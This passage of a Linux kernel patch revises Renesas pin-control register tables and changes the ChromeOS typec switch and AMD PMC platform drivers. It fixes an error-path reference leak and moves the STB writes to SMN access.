++	PINMUX_IPSR_GPSR(IP0SR4_19_16,	TSN0_LINK),
++	PINMUX_IPSR_GPSR(IP0SR4_23_20,	TSN0_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR4_27_24,	TSN0_AVTP_CAPTURE),
++	PINMUX_IPSR_GPSR(IP0SR4_31_28,	TSN0_RX_CTL),
++
++	/* IP1SR4 */
++	PINMUX_IPSR_GPSR(IP1SR4_3_0,	TSN0_AVTP_PPS0),
++	PINMUX_IPSR_GPSR(IP1SR4_7_4,	TSN0_TX_CTL),
++	PINMUX_IPSR_GPSR(IP1SR4_11_8,	TSN0_RD0),
++	PINMUX_IPSR_GPSR(IP1SR4_15_12,	TSN0_RXC),
++	PINMUX_IPSR_GPSR(IP1SR4_19_16,	TSN0_TXC),
++	PINMUX_IPSR_GPSR(IP1SR4_23_20,	TSN0_RD1),
++	PINMUX_IPSR_GPSR(IP1SR4_27_24,	TSN0_TD1),
++	PINMUX_IPSR_GPSR(IP1SR4_31_28,	TSN0_TD0),
++
++	/* IP2SR4 */
++	PINMUX_IPSR_GPSR(IP2SR4_3_0,	TSN0_RD3),
++	PINMUX_IPSR_GPSR(IP2SR4_7_4,	TSN0_RD2),
++	PINMUX_IPSR_GPSR(IP2SR4_11_8,	TSN0_TD3),
++	PINMUX_IPSR_GPSR(IP2SR4_15_12,	TSN0_TD2),
++	PINMUX_IPSR_GPSR(IP2SR4_19_16,	TSN0_TXCREFCLK),
++	PINMUX_IPSR_GPSR(IP2SR4_23_20,	PCIE0_CLKREQ_N),
++	PINMUX_IPSR_GPSR(IP2SR4_27_24,	PCIE1_CLKREQ_N),
++	PINMUX_IPSR_GPSR(IP2SR4_31_28,	AVS0),
++
++	/* IP3SR4 */
++	PINMUX_IPSR_GPSR(IP3SR4_3_0,	AVS1),
++
++	/* IP0SR5 */
++	PINMUX_IPSR_GPSR(IP0SR5_3_0,	AVB2_AVTP_PPS),
++	PINMUX_IPSR_GPSR(IP0SR5_7_4,	AVB2_AVTP_CAPTURE),
++	PINMUX_IPSR_GPSR(IP0SR5_11_8,	AVB2_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR5_15_12,	AVB2_LINK),
++	PINMUX_IPSR_GPSR(IP0SR5_19_16,	AVB2_PHY_INT),
++	PINMUX_IPSR_GPSR(IP0SR5_23_20,	AVB2_MAGIC),
++	PINMUX_IPSR_GPSR(IP0SR5_27_24,	AVB2_MDC),
++	PINMUX_IPSR_GPSR(IP0SR5_31_28,	AVB2_TXCREFCLK),
++
++	/* IP1SR5 */
++	PINMUX_IPSR_GPSR(IP1SR5_3_0,	AVB2_TD3),
++	PINMUX_IPSR_GPSR(IP1SR5_7_4,	AVB2_RD3),
++	PINMUX_IPSR_GPSR(IP1SR5_11_8,	AVB2_MDIO),
++	PINMUX_IPSR_GPSR(IP1SR5_15_12,	AVB2_TD2),
++	PINMUX_IPSR_GPSR(IP1SR5_19_16,	AVB2_TD1),
++	PINMUX_IPSR_GPSR(IP1SR5_23_20,	AVB2_RD2),
++	PINMUX_IPSR_GPSR(IP1SR5_27_24,	AVB2_RD1),
++	PINMUX_IPSR_GPSR(IP1SR5_31_28,	AVB2_TD0),
++
++	/* IP2SR5 */
++	PINMUX_IPSR_GPSR(IP2SR5_3_0,	AVB2_TXC),
++	PINMUX_IPSR_GPSR(IP2SR5_7_4,	AVB2_RD0),
++	PINMUX_IPSR_GPSR(IP2SR5_11_8,	AVB2_RXC),
++	PINMUX_IPSR_GPSR(IP2SR5_15_12,	AVB2_TX_CTL),
++	PINMUX_IPSR_GPSR(IP2SR5_19_16,	AVB2_RX_CTL),
++
+ 	/* IP0SR6 */
+ 	PINMUX_IPSR_GPSR(IP0SR6_3_0,	AVB1_MDIO),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_7_4,	AVB1_MAGIC,		SEL_AVB1_MAGIC_1),
++	PINMUX_IPSR_GPSR(IP0SR6_7_4,	AVB1_MAGIC),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_11_8,	AVB1_MDC,		SEL_AVB1_MDC_1),
++	PINMUX_IPSR_GPSR(IP0SR6_11_8,	AVB1_MDC),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR6_15_12,	AVB1_PHY_INT),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR6_19_16,	AVB1_LINK),
+ 	PINMUX_IPSR_GPSR(IP0SR6_19_16,	AVB1_MII_TX_ER),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_23_20,	AVB1_AVTP_MATCH,	SEL_AVB1_AVTP_MATCH_1),
+-	PINMUX_IPSR_MSEL(IP0SR6_23_20,	AVB1_MII_RX_ER,		SEL_AVB1_AVTP_MATCH_0),
++	PINMUX_IPSR_GPSR(IP0SR6_23_20,	AVB1_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR6_23_20,	AVB1_MII_RX_ER),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_27_24,	AVB1_TXC,		SEL_AVB1_TXC_1),
+-	PINMUX_IPSR_MSEL(IP0SR6_27_24,	AVB1_MII_TXC,		SEL_AVB1_TXC_0),
++	PINMUX_IPSR_GPSR(IP0SR6_27_24,	AVB1_TXC),
++	PINMUX_IPSR_GPSR(IP0SR6_27_24,	AVB1_MII_TXC),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_31_28,	AVB1_TX_CTL,		SEL_AVB1_TX_CTL_1),
+-	PINMUX_IPSR_MSEL(IP0SR6_31_28,	AVB1_MII_TX_EN,		SEL_AVB1_TX_CTL_0),
++	PINMUX_IPSR_GPSR(IP0SR6_31_28,	AVB1_TX_CTL),
++	PINMUX_IPSR_GPSR(IP0SR6_31_28,	AVB1_MII_TX_EN),
+ 
+ 	/* IP1SR6 */
+ 	PINMUX_IPSR_GPSR(IP1SR6_3_0,	AVB1_RXC),
+@@ -1057,17 +1088,17 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP1SR6_7_4,	AVB1_RX_CTL),
+ 	PINMUX_IPSR_GPSR(IP1SR6_7_4,	AVB1_MII_RX_DV),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR6_11_8,	AVB1_AVTP_PPS,		SEL_AVB1_AVTP_PPS_1),
+-	PINMUX_IPSR_MSEL(IP1SR6_11_8,	AVB1_MII_COL,		SEL_AVB1_AVTP_PPS_0),
++	PINMUX_IPSR_GPSR(IP1SR6_11_8,	AVB1_AVTP_PPS),
++	PINMUX_IPSR_GPSR(IP1SR6_11_8,	AVB1_MII_COL),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR6_15_12,	AVB1_AVTP_CAPTURE),
+ 	PINMUX_IPSR_GPSR(IP1SR6_15_12,	AVB1_MII_CRS),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR6_19_16,	AVB1_TD1,		SEL_AVB1_TD1_1),
+-	PINMUX_IPSR_MSEL(IP1SR6_19_16,	AVB1_MII_TD1,		SEL_AVB1_TD1_0),
++	PINMUX_IPSR_GPSR(IP1SR6_19_16,	AVB1_TD1),
++	PINMUX_IPSR_GPSR(IP1SR6_19_16,	AVB1_MII_TD1),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR6_23_20,	AVB1_TD0,		SEL_AVB1_TD0_1),
+-	PINMUX_IPSR_MSEL(IP1SR6_23_20,	AVB1_MII_TD0,		SEL_AVB1_TD0_0),
++	PINMUX_IPSR_GPSR(IP1SR6_23_20,	AVB1_TD0),
++	PINMUX_IPSR_GPSR(IP1SR6_23_20,	AVB1_MII_TD0),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR6_27_24,	AVB1_RD1),
+ 	PINMUX_IPSR_GPSR(IP1SR6_27_24,	AVB1_MII_RD1),
+@@ -1076,14 +1107,14 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP1SR6_31_28,	AVB1_MII_RD0),
+ 
+ 	/* IP2SR6 */
+-	PINMUX_IPSR_MSEL(IP2SR6_3_0,	AVB1_TD2,		SEL_AVB1_TD2_1),
+-	PINMUX_IPSR_MSEL(IP2SR6_3_0,	AVB1_MII_TD2,		SEL_AVB1_TD2_0),
++	PINMUX_IPSR_GPSR(IP2SR6_3_0,	AVB1_TD2),
++	PINMUX_IPSR_GPSR(IP2SR6_3_0,	AVB1_MII_TD2),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR6_7_4,	AVB1_RD2),
+ 	PINMUX_IPSR_GPSR(IP2SR6_7_4,	AVB1_MII_RD2),
+ 
+-	PINMUX_IPSR_MSEL(IP2SR6_11_8,	AVB1_TD3,		SEL_AVB1_TD3_1),
+-	PINMUX_IPSR_MSEL(IP2SR6_11_8,	AVB1_MII_TD3,		SEL_AVB1_TD3_0),
++	PINMUX_IPSR_GPSR(IP2SR6_11_8,	AVB1_TD3),
++	PINMUX_IPSR_GPSR(IP2SR6_11_8,	AVB1_MII_TD3),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR6_15_12,	AVB1_RD3),
+ 	PINMUX_IPSR_GPSR(IP2SR6_15_12,	AVB1_MII_RD3),
+@@ -1091,29 +1122,29 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP2SR6_19_16,	AVB1_TXCREFCLK),
+ 
+ 	/* IP0SR7 */
+-	PINMUX_IPSR_MSEL(IP0SR7_3_0,	AVB0_AVTP_PPS,		SEL_AVB0_AVTP_PPS_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_3_0,	AVB0_MII_COL,		SEL_AVB0_AVTP_PPS_0),
++	PINMUX_IPSR_GPSR(IP0SR7_3_0,	AVB0_AVTP_PPS),
++	PINMUX_IPSR_GPSR(IP0SR7_3_0,	AVB0_MII_COL),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR7_7_4,	AVB0_AVTP_CAPTURE),
+ 	PINMUX_IPSR_GPSR(IP0SR7_7_4,	AVB0_MII_CRS),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_11_8,	AVB0_AVTP_MATCH,	SEL_AVB0_AVTP_MATCH_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_11_8,	AVB0_MII_RX_ER,		SEL_AVB0_AVTP_MATCH_0),
+-	PINMUX_IPSR_MSEL(IP0SR7_11_8,	CC5_OSCOUT,		SEL_AVB0_AVTP_MATCH_0),
++	PINMUX_IPSR_GPSR(IP0SR7_11_8,	AVB0_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR7_11_8,	AVB0_MII_RX_ER),
++	PINMUX_IPSR_GPSR(IP0SR7_11_8,	CC5_OSCOUT),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_15_12,	AVB0_TD3,		SEL_AVB0_TD3_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_15_12,	AVB0_MII_TD3,		SEL_AVB0_TD3_0),
++	PINMUX_IPSR_GPSR(IP0SR7_15_12,	AVB0_TD3),
++	PINMUX_IPSR_GPSR(IP0SR7_15_12,	AVB0_MII_TD3),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR7_19_16,	AVB0_LINK),
+ 	PINMUX_IPSR_GPSR(IP0SR7_19_16,	AVB0_MII_TX_ER),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR7_23_20,	AVB0_PHY_INT),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_27_24,	AVB0_TD2,		SEL_AVB0_TD2_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_27_24,	AVB0_MII_TD2,		SEL_AVB0_TD2_0),
++	PINMUX_IPSR_GPSR(IP0SR7_27_24,	AVB0_TD2),
++	PINMUX_IPSR_GPSR(IP0SR7_27_24,	AVB0_MII_TD2),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_31_28,	AVB0_TD1,		SEL_AVB0_TD1_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_31_28,	AVB0_MII_TD1,		SEL_AVB0_TD1_0),
++	PINMUX_IPSR_GPSR(IP0SR7_31_28,	AVB0_TD1),
++	PINMUX_IPSR_GPSR(IP0SR7_31_28,	AVB0_MII_TD1),
+ 
+ 	/* IP1SR7 */
+ 	PINMUX_IPSR_GPSR(IP1SR7_3_0,	AVB0_RD3),
+@@ -1121,24 +1152,24 @@ static const u16 pinmux_data[] = {
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR7_7_4,	AVB0_TXCREFCLK),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_11_8,	AVB0_MAGIC,		SEL_AVB0_MAGIC_1),
++	PINMUX_IPSR_GPSR(IP1SR7_11_8,	AVB0_MAGIC),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_15_12,	AVB0_TD0,		SEL_AVB0_TD0_1),
+-	PINMUX_IPSR_MSEL(IP1SR7_15_12,	AVB0_MII_TD0,		SEL_AVB0_TD0_0),
++	PINMUX_IPSR_GPSR(IP1SR7_15_12,	AVB0_TD0),
++	PINMUX_IPSR_GPSR(IP1SR7_15_12,	AVB0_MII_TD0),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR7_19_16,	AVB0_RD2),
+ 	PINMUX_IPSR_GPSR(IP1SR7_19_16,	AVB0_MII_RD2),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_23_20,	AVB0_MDC,		SEL_AVB0_MDC_1),
++	PINMUX_IPSR_GPSR(IP1SR7_23_20,	AVB0_MDC),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR7_27_24,	AVB0_MDIO),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_31_28,	AVB0_TXC,		SEL_AVB0_TXC_1),
+-	PINMUX_IPSR_MSEL(IP1SR7_31_28,	AVB0_MII_TXC,		SEL_AVB0_TXC_0),
++	PINMUX_IPSR_GPSR(IP1SR7_31_28,	AVB0_TXC),
++	PINMUX_IPSR_GPSR(IP1SR7_31_28,	AVB0_MII_TXC),
+ 
+ 	/* IP2SR7 */
+-	PINMUX_IPSR_MSEL(IP2SR7_3_0,	AVB0_TX_CTL,		SEL_AVB0_TX_CTL_1),
+-	PINMUX_IPSR_MSEL(IP2SR7_3_0,	AVB0_MII_TX_EN,		SEL_AVB0_TX_CTL_0),
++	PINMUX_IPSR_GPSR(IP2SR7_3_0,	AVB0_TX_CTL),
++	PINMUX_IPSR_GPSR(IP2SR7_3_0,	AVB0_MII_TX_EN),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR7_7_4,	AVB0_RD1),
+ 	PINMUX_IPSR_GPSR(IP2SR7_7_4,	AVB0_MII_RD1),
+@@ -3419,6 +3450,82 @@ static const struct pinmux_cfg_reg pinmux_config_regs[] = {
+ 		IP3SR3_7_4
+ 		IP3SR3_3_0))
+ 	},
++	{ PINMUX_CFG_REG_VAR("IP0SR4", 0xE6060060, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP0SR4_31_28
++		IP0SR4_27_24
++		IP0SR4_23_20
++		IP0SR4_19_16
++		IP0SR4_15_12
++		IP0SR4_11_8
++		IP0SR4_7_4
++		IP0SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP1SR4", 0xE6060064, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP1SR4_31_28
++		IP1SR4_27_24
++		IP1SR4_23_20
++		IP1SR4_19_16
++		IP1SR4_15_12
++		IP1SR4_11_8
++		IP1SR4_7_4
++		IP1SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP2SR4", 0xE6060068, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP2SR4_31_28
++		IP2SR4_27_24
++		IP2SR4_23_20
++		IP2SR4_19_16
++		IP2SR4_15_12
++		IP2SR4_11_8
++		IP2SR4_7_4
++		IP2SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP3SR4", 0xE606006C, 32,
++			     GROUP(-28, 4),
++			     GROUP(
++		/* IP3SR4_31_4 RESERVED */
++		IP3SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP0SR5", 0xE6060860, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP0SR5_31_28
++		IP0SR5_27_24
++		IP0SR5_23_20
++		IP0SR5_19_16
++		IP0SR5_15_12
++		IP0SR5_11_8
++		IP0SR5_7_4
++		IP0SR5_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP1SR5", 0xE6060864, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP1SR5_31_28
++		IP1SR5_27_24
++		IP1SR5_23_20
++		IP1SR5_19_16
++		IP1SR5_15_12
++		IP1SR5_11_8
++		IP1SR5_7_4
++		IP1SR5_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP2SR5", 0xE6060868, 32,
++			     GROUP(-12, 4, 4, 4, 4, 4),
++			     GROUP(
++		/* IP2SR5_31_20 RESERVED */
++		IP2SR5_19_16
++		IP2SR5_15_12
++		IP2SR5_11_8
++		IP2SR5_7_4
++		IP2SR5_3_0))
++	},
+ 	{ PINMUX_CFG_REG("IP0SR6", 0xE6061060, 32, 4, GROUP(
+ 		IP0SR6_31_28
+ 		IP0SR6_27_24
+@@ -3505,95 +3612,6 @@ static const struct pinmux_cfg_reg pinmux_config_regs[] = {
+ 
+ #define F_(x, y)	x,
+ #define FM(x)		FN_##x,
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL4", 0xE6060100, 32,
+-			     GROUP(-12, 1, 1, -2, 1, 1, -1, 1, -2, 1, 1, -2, 1,
+-				   -2, 1, 1, -1),
+-			     GROUP(
+-		/* RESERVED 31-20 */
+-		MOD_SEL4_19
+-		MOD_SEL4_18
+-		/* RESERVED 17-16 */
+-		MOD_SEL4_15
+-		MOD_SEL4_14
+-		/* RESERVED 13 */
+-		MOD_SEL4_12
+-		/* RESERVED 11-10 */
+-		MOD_SEL4_9
+-		MOD_SEL4_8
+-		/* RESERVED 7-6 */
+-		MOD_SEL4_5
+-		/* RESERVED 4-3 */
+-		MOD_SEL4_2
+-		MOD_SEL4_1
+-		/* RESERVED 0 */
+-		))
+-	},
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL5", 0xE6060900, 32,
+-			     GROUP(-12, 1, -2, 1, 1, -2, 1, 1, -2, 1, -1,
+-				   1, 1, -2, 1, -1, 1),
+-			     GROUP(
+-		/* RESERVED 31-20 */
+-		MOD_SEL5_19
+-		/* RESERVED 18-17 */
+-		MOD_SEL5_16
+-		MOD_SEL5_15
+-		/* RESERVED 14-13 */
+-		MOD_SEL5_12
+-		MOD_SEL5_11
+-		/* RESERVED 10-9 */
+-		MOD_SEL5_8
+-		/* RESERVED 7 */
+-		MOD_SEL5_6
+-		MOD_SEL5_5
+-		/* RESERVED 4-3 */
+-		MOD_SEL5_2
+-		/* RESERVED 1 */
+-		MOD_SEL5_0))
+-	},
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL6", 0xE6061100, 32,
+-			     GROUP(-13, 1, -1, 1, -2, 1, 1,
+-				   -1, 1, -2, 1, 1, 1, -2, 1, 1, -1),
+-			     GROUP(
+-		/* RESERVED 31-19 */
+-		MOD_SEL6_18
+-		/* RESERVED 17 */
+-		MOD_SEL6_16
+-		/* RESERVED 15-14 */
+-		MOD_SEL6_13
+-		MOD_SEL6_12
+-		/* RESERVED 11 */
+-		MOD_SEL6_10
+-		/* RESERVED 9-8 */
+-		MOD_SEL6_7
+-		MOD_SEL6_6
+-		MOD_SEL6_5
+-		/* RESERVED 4-3 */
+-		MOD_SEL6_2
+-		MOD_SEL6_1
+-		/* RESERVED 0 */
+-		))
+-	},
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL7", 0xE6061900, 32,
+-			     GROUP(-15, 1, 1, -1, 1, -1, 1, 1, -2, 1, 1,
+-				   -2, 1, 1, -1, 1),
+-			     GROUP(
+-		/* RESERVED 31-17 */
+-		MOD_SEL7_16
+-		MOD_SEL7_15
+-		/* RESERVED 14 */
+-		MOD_SEL7_13
+-		/* RESERVED 12 */
+-		MOD_SEL7_11
+-		MOD_SEL7_10
+-		/* RESERVED 9-8 */
+-		MOD_SEL7_7
+-		MOD_SEL7_6
+-		/* RESERVED 5-4 */
+-		MOD_SEL7_3
+-		MOD_SEL7_2
+-		/* RESERVED 1 */
+-		MOD_SEL7_0))
+-	},
+ 	{ PINMUX_CFG_REG_VAR("MOD_SEL8", 0xE6068100, 32,
+ 			     GROUP(-20, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1),
+ 			     GROUP(
+diff --git a/drivers/platform/chrome/cros_typec_switch.c b/drivers/platform/chrome/cros_typec_switch.c
+index a26219e97c931..26af51952f7f1 100644
+--- a/drivers/platform/chrome/cros_typec_switch.c
++++ b/drivers/platform/chrome/cros_typec_switch.c
+@@ -268,6 +268,7 @@ static int cros_typec_register_switches(struct cros_typec_switch_data *sdata)
+ 
+ 	return 0;
+ err_switch:
++	fwnode_handle_put(fwnode);
+ 	cros_typec_unregister_switches(sdata);
+ 	return ret;
+ }
+diff --git a/drivers/platform/x86/amd/Kconfig b/drivers/platform/x86/amd/Kconfig
+index 2ce8cb2170dfc..d9685aef0887d 100644
+--- a/drivers/platform/x86/amd/Kconfig
++++ b/drivers/platform/x86/amd/Kconfig
+@@ -7,7 +7,7 @@ source "drivers/platform/x86/amd/pmf/Kconfig"
+ 
+ config AMD_PMC
+ 	tristate "AMD SoC PMC driver"
+-	depends on ACPI && PCI && RTC_CLASS
++	depends on ACPI && PCI && RTC_CLASS && AMD_NB
+ 	select SERIO
+ 	help
+ 	  The driver provides support for AMD Power Management Controller
+diff --git a/drivers/platform/x86/amd/pmc.c b/drivers/platform/x86/amd/pmc.c
+index 3cbb01ec10e32..45b0050dfbf7b 100644
+--- a/drivers/platform/x86/amd/pmc.c
++++ b/drivers/platform/x86/amd/pmc.c
+@@ -10,6 +10,7 @@
+ 
+ #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+ 
++#include <asm/amd_nb.h>
+ #include <linux/acpi.h>
+ #include <linux/bitfield.h>
+ #include <linux/bits.h>
+@@ -37,8 +38,6 @@
+ #define AMD_PMC_SCRATCH_REG_YC		0xD14
+ 
+ /* STB Registers */
+-#define AMD_PMC_STB_INDEX_ADDRESS	0xF8
+-#define AMD_PMC_STB_INDEX_DATA		0xFC
+ #define AMD_PMC_STB_PMI_0		0x03E30600
+ #define AMD_PMC_STB_S2IDLE_PREPARE	0xC6000001
+ #define AMD_PMC_STB_S2IDLE_RESTORE	0xC6000002
+@@ -55,8 +54,6 @@
+ #define S2D_TELEMETRY_DRAMBYTES_MAX	0x1000000
+ 
+ /* Base address of SMU for mapping physical address to virtual address */
+-#define AMD_PMC_SMU_INDEX_ADDRESS	0xB8
+-#define AMD_PMC_SMU_INDEX_DATA		0xBC
+ #define AMD_PMC_MAPPING_SIZE		0x01000
+ #define AMD_PMC_BASE_ADDR_OFFSET	0x10000
+ #define AMD_PMC_BASE_ADDR_LO		0x13B102E8
+@@ -314,33 +311,6 @@ static int amd_pmc_setup_smu_logging(struct amd_pmc_dev *dev)
+ 	return 0;
+ }
+ 
+-static int amd_pmc_idlemask_read(struct amd_pmc_dev *pdev, struct device *dev,
+-				 struct seq_file *s)
+-{
+-	u32 val;
+-
+-	switch (pdev->cpu_id) {
+-	case AMD_CPU_ID_CZN:
+-		val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_CZN);
+-		break;
+-	case AMD_CPU_ID_YC:
+-	case AMD_CPU_ID_CB:
+-	case AMD_CPU_ID_PS:
+-		val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_YC);
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
+-	if (dev)
+-		dev_dbg(pdev->dev, "SMU idlemask s0i3: 0x%x\n", val);
+-
+-	if (s)
+-		seq_printf(s, "SMU idlemask : 0x%x\n", val);
+-
+-	return 0;
+-}
+-
+ static int get_metrics_table(struct amd_pmc_dev *pdev, struct smu_metrics *table)
+ {
+ 	if (!pdev->smu_virt_addr) {
+@@ -377,6 +347,9 @@ static int amd_pmc_get_smu_version(struct amd_pmc_dev *dev)
+ 	int rc;
+ 	u32 val;
+ 
++	if (dev->cpu_id == AMD_CPU_ID_PCO)
++		return -ENODEV;
++
+ 	rc = amd_pmc_send_cmd(dev, 0, &val, SMU_MSG_GETSMUVERSION, 1);
+ 	if (rc)
+ 		return rc;
+@@ -423,12 +396,31 @@ static ssize_t smu_program_show(struct device *d, struct device_attribute *attr,
+ static DEVICE_ATTR_RO(smu_fw_version);
+ static DEVICE_ATTR_RO(smu_program);
+ 
++static umode_t pmc_attr_is_visible(struct kobject *kobj, struct attribute *attr, int idx)
++{
++	struct device *dev = kobj_to_dev(kobj);
++	struct amd_pmc_dev *pdev = dev_get_drvdata(dev);
++
++	if (pdev->cpu_id == AMD_CPU_ID_PCO)
++		return 0;
++	return 0444;
++}
++
+ static struct attribute *pmc_attrs[] = {
+ 	&dev_attr_smu_fw_version.attr,
+ 	&dev_attr_smu_program.attr,
+ 	NULL,
+ };
+-ATTRIBUTE_GROUPS(pmc);
++
++static struct attribute_group pmc_attr_group = {
++	.attrs = pmc_attrs,
++	.is_visible = pmc_attr_is_visible,
++};
++
++static const struct attribute_group *pmc_groups[] = {
++	&pmc_attr_group,
++	NULL,
++};
+ 
+ static int smu_fw_info_show(struct seq_file *s, void *unused)
+ {
+@@ -495,28 +487,47 @@ static int s0ix_stats_show(struct seq_file *s, void *unused)
+ }
+ DEFINE_SHOW_ATTRIBUTE(s0ix_stats);
+ 
+-static int amd_pmc_idlemask_show(struct seq_file *s, void *unused)
++static int amd_pmc_idlemask_read(struct amd_pmc_dev *pdev, struct device *dev,
++				 struct seq_file *s)
+ {
+-	struct amd_pmc_dev *dev = s->private;
++	u32 val;
+ 	int rc;
+ 
+-	/* we haven't yet read SMU version */
+-	if (!dev->major) {
+-		rc = amd_pmc_get_smu_version(dev);
+-		if (rc)
+-			return rc;
++	switch (pdev->cpu_id) {
++	case AMD_CPU_ID_CZN:
++		/* we haven't yet read SMU version */
++		if (!pdev->major) {
++			rc = amd_pmc_get_smu_version(pdev);
++			if (rc)
++				return rc;
++		}
++		if (pdev->major > 56 || (pdev->major >= 55 && pdev->minor >= 37))
++			val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_CZN);
++		else
++			return -EINVAL;
++		break;
++	case AMD_CPU_ID_YC:
++	case AMD_CPU_ID_CB:
++	case AMD_CPU_ID_PS:
++		val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_YC);
++		break;
++	default:
++		return -EINVAL;
+ 	}
+ 
+-	if (dev->major > 56 || (dev->major >= 55 && dev->minor >= 37)) {
+-		rc = amd_pmc_idlemask_read(dev, NULL, s);
+-		if (rc)
+-			return rc;
+-	} else {
+-		seq_puts(s, "Unsupported SMU version for Idlemask\n");
+-	}
++	if (dev)
++		dev_dbg(pdev->dev, "SMU idlemask s0i3: 0x%x\n", val);
++
++	if (s)
++		seq_printf(s, "SMU idlemask : 0x%x\n", val);
+ 
+ 	return 0;
+ }
++
++static int amd_pmc_idlemask_show(struct seq_file *s, void *unused)
++{
++	return amd_pmc_idlemask_read(s->private, NULL, s);
++}
+ DEFINE_SHOW_ATTRIBUTE(amd_pmc_idlemask);
+ 
+ static void amd_pmc_dbgfs_unregister(struct amd_pmc_dev *dev)
+@@ -787,6 +798,14 @@ static void amd_pmc_s2idle_check(void)
+ 		dev_err(pdev->dev, "error writing to STB: %d\n", rc);
+ }
+ 
++static int amd_pmc_dump_data(struct amd_pmc_dev *pdev)
++{
++	if (pdev->cpu_id == AMD_CPU_ID_PCO)
++		return -ENODEV;
++
++	return amd_pmc_send_cmd(pdev, 0, NULL, SMU_MSG_LOG_DUMP_DATA, 0);
++}
++
+ static void amd_pmc_s2idle_restore(void)
+ {
+ 	struct amd_pmc_dev *pdev = &pmc;
+@@ -799,7 +818,7 @@ static void amd_pmc_s2idle_restore(void)
+ 		dev_err(pdev->dev, "resume failed: %d\n", rc);
+ 
+ 	/* Let SMU know that we are looking for stats */
+-	amd_pmc_send_cmd(pdev, 0, NULL, SMU_MSG_LOG_DUMP_DATA, 0);
++	amd_pmc_dump_data(pdev);
+ 
+ 	rc = amd_pmc_write_stb(pdev, AMD_PMC_STB_S2IDLE_RESTORE);
+ 	if (rc)
+@@ -880,17 +899,9 @@ static int amd_pmc_write_stb(struct amd_pmc_dev *dev, u32 data)
+ {
+ 	int err;
+ 
+-	err = pci_write_config_dword(dev->rdev, AMD_PMC_STB_INDEX_ADDRESS, AMD_PMC_STB_PMI_0);
++	err = amd_smn_write(0, AMD_PMC_STB_PMI_0, data);
+ 	if (err) {
+-		dev_err(dev->dev, "failed to write addr in stb: 0x%X\n",
+-			AMD_PMC_STB_INDEX_ADDRESS);
+-		return pcibios_err_to_errno(err);
+-	}
+-
+-	err = pci_write_config_dword(dev->rdev, AMD_PMC_STB_INDEX_DATA, data);
+-	if (err) {
+-		dev_err(dev->dev, "failed to write data in stb: 0x%X\n",
+-			AMD_PMC_STB_INDEX_DATA);
++		dev_err(dev->dev, "failed to write data in stb: 0x%X\n", AMD_PMC_STB_PMI_0);
+ 		return pcibios_err_to_errno(err);
+ 	}
+ 
+@@ -902,18 +913,10 @@ static int amd_pmc_read_stb(struct amd_pmc_dev *dev, u32 *buf)
+ {
+ 	int i, err;
+ 
+-	err = pci_write_config_dword(dev->rdev, AMD_PMC_STB_INDEX_ADDRESS, AMD_PMC_STB_PMI_0);
+-	if (err) {
+-		dev_err(dev->dev, "error writing addr to stb: 0x%X\n",
